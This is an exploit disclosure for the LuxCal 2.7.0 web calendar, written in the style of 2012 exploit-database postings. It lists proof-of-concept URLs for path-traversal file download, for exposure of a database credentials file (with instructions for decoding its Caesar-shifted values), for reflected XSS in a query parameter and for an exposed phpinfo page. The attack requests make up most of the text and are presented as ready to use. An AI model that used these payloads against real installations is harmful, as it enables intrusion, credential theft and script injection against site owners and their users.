#################################################### Exploit Title: LuxCal v2.7.0 Multiple Remote Vulnerabilities### Date: 17/09/2012 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.luxsoft.eu/### Software Link: http://www.luxsoft.eu/dloader.php?file=luxcal270.zip### Version: 2.7.0### Tested on: Linux/Windows #################################################1- Local File Inclusion :* P.O.C :
http://127.0.0.1/luxcal270/dloader.php?fName=../index.php
this is example for download the source of index script , you will see the source inside as name of affected file"dloader.php"2- Information Disclosure :* P.O.C :
http://127.0.0.1/luxcal270/lcaldbc.dat
- you will see the information of database but encrypte as Caesar cipher methode in shift 11 e.g.:
LuxCal
2.7.0
p 5{x 0;h 9"adrpawdhi";x 1;h 4"ajmm";x 2;h 4"gddi";x 3;h 6"000000";x 4;h 0"";}- my information in database is:
mysql server : localhost
mysql username : root
mysql password :000000
mysql database : luxx
- when i install script all this name of information is encrypte and the word become as we see before infile"lcaldbc.dat":
mysql server : adrpawdhi
mysql username : gddi
mysql password :000000
mysql database : ajmm
- you ask me how to decrypt that , you can decrypt by many ways but i give the easy way here :
http://www.richkni.co.uk/php/crypta/caesar.php
you can put your text and submit to decipher that word , then search in" Processed text - shift 11 "
you will see your decrypted word ..3- XSS :* P.O.C :
http://127.0.0.1/luxcal270/index.php?cD=[XSS]
also some files is affected
4- phpinfo ():
http://127.0.0.1/luxcal270/pages/phpinfo.php
############################################# Greetz to my friendz
